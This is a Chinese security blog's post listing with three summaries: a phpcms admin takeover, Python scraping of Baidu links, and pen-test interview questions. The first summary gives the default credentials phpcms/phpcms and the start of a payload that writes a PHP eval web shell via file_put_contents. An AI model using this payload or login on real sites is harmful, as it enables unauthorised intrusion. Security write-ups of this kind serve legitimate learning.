摘要: http://xx.xx.com/index.php?m=admin 进入后台登录界面,弱口令phpcms/phpcms成功登录后台 先将如下payload保存至txt文本中 array(1);$b=file_put_contents("phpcms_shell3.php",'<?php eval( 阅读全文
posted @ 2020-07-26 19:50 要加油的萌新 阅读(2505) 评论(0) 推荐(0) 编辑
摘要: 记录一下在用python爬取百度链接中遇到的坑: 1.获取百度搜索页面中的域名URL BeautifulSoup获取a标签中href属性后,链接为百度url,利用request直接访问默认会直接进行跳转,无法获取所需域名 此时需要将requests的allow_redirects属性设置为False 阅读全文
posted @ 2020-03-23 13:38 要加油的萌新 阅读(870) 评论(4) 推荐(0) 编辑
摘要: 最近春招准备面试,特开此博客记录从毕业到现在的一些安服渗透测试面试问题,也希望可以帮到一些同样在准备面试的表哥们(按问题频率由高到低排列) WEB渗透: 挖到过你认为最有意思,或危害最大的一个漏洞 说一下你平常测试的渗透思路 要是给你一个只有登录界面的后台管理系统,你有什么思路 SQL注入的分类,以 阅读全文
posted @ 2020-03-08 22:34 要加油的萌新 阅读(752) 评论(0) 推荐(0) 编辑